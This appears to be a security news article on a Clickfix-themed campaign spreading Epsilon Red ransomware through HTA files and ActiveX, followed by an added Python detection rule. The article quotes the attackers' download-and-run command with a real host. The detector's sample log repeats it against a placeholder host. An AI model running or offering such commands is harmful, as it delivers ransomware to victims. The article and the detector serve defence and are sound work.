Security researchers at CloudSEK have uncovered a sophisticated malware delivery campaign using Clickfix-themed websites to distribute Epsilon Red ransomware, marking a dangerous evolution in social engineering tactics.
The campaign leverages malicious .HTA files and ActiveX objects that can silently execute shell commands, bypassing traditional security measures while impersonating popular online services to deceive victims.
Unlike conventional Clickfix campaigns that copy malicious commands to clipboards, this variant employs a more direct approach by urging victims to visit a secondary page where JavaScript code creates an ActiveXObject to execute Windows shell commands.
The malicious script runs var shell = new ActiveXObject("WScript.Shell"); to establish command-line access, then silently downloads and executes the ransomware payload using the command: shell.Run("cmd /c cd /D %userprofile% && curl -s -o a.exe http://155.94.155[.]227:2269/dw/vir.exe && a.exe", 0);.
The attack concludes with a sophisticated social engineering element, displaying a fake verification message that reads “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” – a deliberately misspelled prompt designed to appear non-threatening while maintaining the illusion of legitimate verification.
The intentional typo in “Verificatification” serves to lower victims’ suspicion by making the prompt appear amateurish rather than malicious.
CloudSEK’s investigation revealed that threat actors are operating an extensive infrastructure network, impersonating widely used services, including Discord Captcha Bot, Kick, Twitch, Rumble, and OnlyFans, to maximize their reach.
The researchers also discovered romance-themed and dating-focused Clickfix delivery pages operated by the same cybercriminal group, indicating a diversified approach to victim targeting.
Epsilon Red ransomware, first identified in 2021, bears stylistic similarities to the notorious REvil ransomware in its ransom note formatting.
However, security experts note that beyond aesthetic resemblance, the two ransomware families appear operationally distinct.
The malware sample (MD5: 98107c01ecd8b7802582d404e007e493) demonstrates the group’s continued evolution and adaptation of their attack methods.
The campaign’s impact extends beyond individual infections, as the abuse of ActiveXObject enables remote code execution directly from browser sessions, effectively bypassing traditional download protections.
Security experts recommend disabling ActiveX and Windows Script Host through Group Policy, implementing threat intelligence feeds to block known malicious IP addresses, and deploying endpoint detection rules to identify suspicious browser-spawned processes.
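As an added detection example (not code from CloudSEK or this article), the rule below scores constructed process-creation events for the chain this campaign produces: mshta.exe (the host for .HTA files) or a browser spawning cmd.exe that downloads a binary with curl and immediately runs it. The tab-separated key=value log format, the field names, the severity tiers and the ATTACKER_HOST:PORT placeholder are assumptions.

```python
import re

# Parents that should almost never spawn a shell that downloads and runs binaries.
SUSPICIOUS_PARENTS = {"mshta.exe", "wscript.exe", "cscript.exe", "msedge.exe",
                      "chrome.exe", "firefox.exe", "iexplore.exe"}
DOWNLOADER = re.compile(r"\b(curl|certutil|bitsadmin)\b", re.I)
OUTPUT_FILE = re.compile(r"-o\s+(\S+\.exe)", re.I)        # curl -o <file>
CHAINED_EXEC = re.compile(r"&&\s*(\S+\.exe)\s*$", re.I)   # ... && <file>

def parse_event(line):
    """Parse one constructed tab-separated key=value process-creation event."""
    fields = {}
    for part in line.rstrip("\n").split("\t"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields

def evaluate(event):
    """Return (pid, severity, reason) when a browser or script host spawned
    cmd.exe that invokes a downloader; 'high' when the command also executes
    the file it just downloaded (the Clickfix pattern), else None."""
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "")
    if parent not in SUSPICIOUS_PARENTS or image != "cmd.exe":
        return None
    if not DOWNLOADER.search(cmd):
        return None
    pid = int(event.get("ProcessId", 0))
    out, run = OUTPUT_FILE.search(cmd), CHAINED_EXEC.search(cmd)
    if out and run and out.group(1).lower() == run.group(1).lstrip(".\\").lower():
        return pid, "high", f"{parent} spawned cmd.exe to download and run {out.group(1)}"
    return pid, "medium", f"{parent} spawned cmd.exe that invokes a downloader"

def scan(lines):
    """Evaluate every event line and return the list of findings."""
    return [f for f in (evaluate(parse_event(line)) for line in lines) if f]

# Constructed sample events; ATTACKER_HOST:PORT is a placeholder, not the real C2.
SAMPLE_LOG = [
    "Image=C:\\Windows\\System32\\cmd.exe\tCommandLine=cmd /c cd /D %userprofile% "
    "&& curl -s -o a.exe http://ATTACKER_HOST:PORT/dw/vir.exe && a.exe"
    "\tParentImage=C:\\Windows\\System32\\mshta.exe\tProcessId=4312",
    "Image=C:\\Windows\\System32\\cmd.exe\tCommandLine=cmd /c echo hello"
    "\tParentImage=C:\\Windows\\explorer.exe\tProcessId=5120",
    "Image=C:\\Windows\\System32\\cmd.exe\tCommandLine=cmd /c curl -s -o x.exe "
    "http://ATTACKER_HOST:PORT/x.exe\tParentImage=C:\\Edge\\msedge.exe\tProcessId=6001",
]
```

Feeding real Sysmon Event ID 1 or EDR process-creation telemetry into scan() only requires mapping its Image, ParentImage, CommandLine and ProcessId fields to the same keys.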